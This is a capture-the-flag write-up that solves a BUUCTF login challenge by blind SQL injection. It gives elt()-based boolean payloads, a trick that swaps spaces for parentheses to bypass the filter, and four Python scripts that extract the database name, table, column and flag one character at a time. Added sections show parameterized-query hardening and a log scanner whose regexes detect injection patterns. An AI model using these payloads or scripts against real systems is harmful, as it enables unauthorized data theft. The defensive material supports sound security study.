Welcome to my WeChat official account, the soul of the shell.
Environment: BUUCTF online judge (buuoj.cn)
Like the previous target machine, this one is also a login box, but it has a few more buttons, and the challenge hint also says it is solved with SQL blind injection.
![](/images/doc/58de6dba80c67364ef4574e6c3edeaff.jpg)
Do a simple fuzz on the login box.
You can see that parentheses are filtered, so error-based injection is useless here.
![](/images/doc/42591b5fb34b0afb3cfe04ed9b348f65.jpg)
However, there is more than one injectable point. Clicking the button on the home page reveals a numeric injection point, where blind injection can be tried.
Do some fuzzing.
Only a few keywords are filtered, far fewer than at the previous injection point, but the if function is filtered; it can be replaced with elt.
![](/images/doc/52671473bd303057a82189144d60b7f2.jpg)
![](/images/doc/e95f5907553edbac8d25baf825c1d449.jpg)
First, check whether elt can be used:
`/search.php?id=elt(length(database())>1,6)`
![](/images/doc/38202382bbddda614692155b1bcb1cf0.jpg)
Having confirmed that the elt function can be used for blind injection, the next step is the blind injection itself.
Because this injection point filters spaces, I use () to bypass the filter. The big problem with bypassing via () is that the statements become very messy, so I test the statements locally in segments, and only run them against the target once I have confirmed they work.
Before writing a script, we first need the decision rule for the blind injection: determine how the response to a correct statement differs from the response to a wrong one.
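The reason the elt and () tricks work at all is that the numeric parameter is concatenated straight into SQL and only a keyword blacklist stands in the way. The following is an added example, not code from the write-up or the challenge: it contrasts that concatenated pattern with a parameterized query, using Python's sqlite3 as a stand-in for the challenge's MySQL backend. The table, the ids and the payload are constructed, and the CASE expression replaces elt(), which SQLite does not have.

```python
import sqlite3


def build_db():
    """Constructed demo database standing in for the challenge's search.php backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(1, "apple"), (2, "banana"), (6, "secret")])
    return conn


def search_vulnerable(conn, user_id):
    """Builds the query by string concatenation, as the challenge's numeric
    injection point evidently does: whatever expression the user sends becomes
    SQL, which is why a blacklist of spaces and 'if' is not enough."""
    query = "SELECT name FROM items WHERE id=" + user_id
    return [row[0] for row in conn.execute(query)]


def search_hardened(conn, user_id):
    """Validates the type first (id is numeric by design) and then binds the
    value as a parameter, so the driver never interprets it as SQL."""
    if not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    rows = conn.execute("SELECT name FROM items WHERE id=?", (int(user_id),))
    return [row[0] for row in rows]


def hardened_rejects(conn, user_id):
    """True if the hardened search refuses the input outright."""
    try:
        search_hardened(conn, user_id)
    except ValueError:
        return True
    return False


# Constructed payload in the shape the write-up uses: a boolean condition folded
# into an expression that evaluates to an existing id (6) when the condition
# holds, so the response reveals the truth value of the condition.
PAYLOAD = "(case when length('geek')>1 then 6 else 0 end)"

if __name__ == "__main__":
    conn = build_db()
    print("vulnerable:", search_vulnerable(conn, PAYLOAD))  # the condition picks the row
    print("hardened:  ", search_hardened(conn, "2"))
    print("rejected:  ", hardened_rejects(conn, PAYLOAD))
```

The hardened version rejects the expression before it ever reaches the database; with binding, even an input that slipped past the type check would be compared as a literal value rather than executed as SQL.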
Correct execution
![](/images/doc/cfc8a59bbde211d76c9fd57faaa73e88.jpg)
Error execution
![](/images/doc/7f37a43903cb92e8b5b1b7ce83aab455.jpg)
Syntax error
![](/images/doc/4085f8f202c870ce7436e3030368ce2b.jpg)
First, get the length of the database name.
You can see that the length is 4.
![](/images/doc/c96ff13db2069cf84955a0da1a9c51ce.jpg)
Then determine the database name with a Python script. Since buuctf's server also returns a 200 status code, the script checks the status code as well (those who know, know).
```python
import requests

q = []
# Add numbers to the list
for x in range(0, 10):
    q.append(x)
# Add lowercase letters and commas to the list
for x in range(ord("a"), ord("z")+1):
    q.append(chr(x))
q.append(",")
# print(q)

# The name has length 4, so test positions 1..4 one character at a time
for i in range(1, 5):
    for s in q:
        url = "http://cb93c4a8-bc95-43db-be46-28be43869ea1.node4.buuoj.cn:81/search.php?id="
        url = url + "elt(substr((select(database())),%d,1)='%s',6)" % (i, s)
        r = requests.get(url)
        # A true condition selects id 6 and returns a normal page without "ERROR!!!"
        if ("ERROR!!!" not in r.text) and (r.status_code == 200):
            print(url)
            break
        # print(url)
```
We see that the database name is geek.
![](/images/doc/6a1c73294a4204a40a2d92560ff1b6b8.jpg)
Then determine the table name.
```python
import requests

q = []
# Add numbers to the list
for x in range(0, 10):
    q.append(x)
# Add lowercase letters and commas to the list
for x in range(ord("a"), ord("z")+1):
    q.append(chr(x))
q.append(",")
# print(q)

for i in range(1, 17):
    for s in q:
        url = "http://cb93c4a8-bc95-43db-be46-28be43869ea1.node4.buuoj.cn:81/search.php?id="
        # Readable form of the statement below, before spaces are replaced with ():
        # elt(substr((select group_concat(table_name) from information_schema.tables where table_schema='geek'),1,1)='e',6)
        url = url + "elt(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),%d,1)='%s',6)" % (i, s)
        r = requests.get(url)
        if ("ERROR!!!" not in r.text) and (r.status_code == 200):
            print(url)
            break
        # print(url)
```
![](/images/doc/349044d7f80baf5cc59bd2eed48fb1bd.jpg)
I ran into a strange problem when dumping the column names, and I don't know why. When dumping the table name, it responded correctly regardless of case, but when dumping the columns it is case sensitive. The field name I entered at the beginning was f1nal1y, but it could not be dumped; it had to be replaced with F1naI1y.
```python
import requests

q = []
# Add numbers to the list
for x in range(0, 10):
    q.append(x)
# Add lowercase letters and commas to the list
for x in range(ord("a"), ord("z")+1):
    q.append(chr(x))
q.append(",")
# print(q)

# Positions 1..16 were already recovered; continue from 17
for i in range(17, 21):
    for s in q:
        url = "http://cb93c4a8-bc95-43db-be46-28be43869ea1.node4.buuoj.cn:81/search.php?id="
        # Readable form of the earlier table-name statement, for comparison:
        # elt(substr((select group_concat(table_name) from information_schema.tables where table_schema='geek'),1,1)='e',6)
        url = url + "elt(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1)='%s',6)" % (i, s)
        r = requests.get(url)
        if ("ERROR!!!" not in r.text) and (r.status_code == 200):
            print(url)
            break
        # print(url)
```
![](/images/doc/dac96e87acca6eaaebc603d05b1e6d8f.jpg)
The flag is finally hidden in the password field, and this value is quite long, so it takes a long time to run.
```python
import requests

q = []
# Add numbers to the list
for x in range(0, 10):
    q.append(x)
# Add lowercase letters, commas, _, -, {} to the list
for x in range(ord("a"), ord("z")+1):
    q.append(chr(x))
q.append(",")
q.append("_")
q.append("-")
q.append("{")
q.append("}")
# print(q)

for i in range(1, 230):
    for s in q:
        url = "http://cb93c4a8-bc95-43db-be46-28be43869ea1.node4.buuoj.cn:81/search.php?id="
        # Readable form of the earlier table-name statement, for comparison:
        # elt(substr((select group_concat(table_name) from information_schema.tables where table_schema='geek'),1,1)='e',6)
        url = url + "elt(substr((select(group_concat(password))from(F1naI1y)),%d,1)='%s',6)" % (i, s)
        r = requests.get(url)
        if ("ERROR!!!" not in r.text) and (r.status_code == 200):
            # Print the recovered character without a newline so the value builds up on one line
            print(s, end="")
            break
        # print(url)
```
![](/images/doc/86239f410ec7b72be916ccaba614a47f.jpg)
(As a result, it had to be run again because of the target machine's mechanism.)
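Loops like the ones above leave a very recognizable trail in the web server's access log: hundreds of requests from one client to the same endpoint, each carrying elt()/substr() expressions or information_schema references in the query string, differing only in the position and the guessed character. The following is an added example, not part of the write-up, that scans access-log lines for those indicators and flags clients that send a run of them. The log lines are constructed in Apache combined format and mimic the probes shown earlier; the indicator list and threshold are my own choices.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined format). 10.0.0.9 replays the
# shape of the write-up's probes; 10.0.0.5 is ordinary browsing.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /search.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /search.php?id=elt(length(database())>1,6) HTTP/1.1" 200 611 "-" "python-requests/2.28"
10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /search.php?id=elt(substr((select(database())),1,1)='a',6) HTTP/1.1" 200 301 "-" "python-requests/2.28"
10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /search.php?id=elt(substr((select(database())),1,1)='g',6) HTTP/1.1" 200 611 "-" "python-requests/2.28"
10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /search.php?id=elt(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),1,1)='f',6) HTTP/1.1" 200 611 "-" "python-requests/2.28"
10.0.0.5 - - [01/Jan/2024:12:00:05 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each indicator is (label, pattern) matched against the URL-decoded request path.
INDICATORS = [
    ("sql-function", re.compile(
        r"\b(elt|if|substr|substring|mid|ascii|ord|sleep|benchmark|group_concat)\s*\(", re.I)),
    ("select-subquery", re.compile(r"\(\s*select\b", re.I)),
    ("schema-enum", re.compile(r"information_schema\.", re.I)),
    # Keywords glued to parentheses: the space-filter bypass the write-up relies on
    ("paren-as-space", re.compile(r"\)(from|where|select)\(", re.I)),
]


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode %xx and '+' so percent-encoded payloads are inspected in the clear
    rec["path"] = unquote_plus(rec["path"])
    return rec


def indicators_for(path):
    """Return the labels of every indicator that fires on a decoded request path."""
    return [label for label, pat in INDICATORS if pat.search(path)]


def analyze(log_text):
    """Aggregate per client: total requests, suspicious requests, indicator labels seen."""
    report = defaultdict(lambda: {"requests": 0, "hits": 0, "indicators": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        entry = report[rec["ip"]]
        entry["requests"] += 1
        found = indicators_for(rec["path"])
        if found:
            entry["hits"] += 1
            entry["indicators"].update(found)
    return dict(report)


def flagged_clients(log_text, threshold=3):
    """Clients whose count of suspicious requests reaches the threshold. One odd
    request may be noise; a run of them is a character-by-character enumeration loop."""
    return sorted(ip for ip, e in analyze(log_text).items() if e["hits"] >= threshold)


if __name__ == "__main__":
    for ip, e in analyze(SAMPLE_LOG).items():
        print(ip, e["requests"], e["hits"], sorted(e["indicators"]))
    print("flagged:", flagged_clients(SAMPLE_LOG))
```

The per-client count matters more than any single pattern: a real enumeration sends one request per candidate character per position, so even a low threshold separates it from a stray false positive, and the set of indicator labels tells the responder which stage (database name, table names, column names, data) the client had reached.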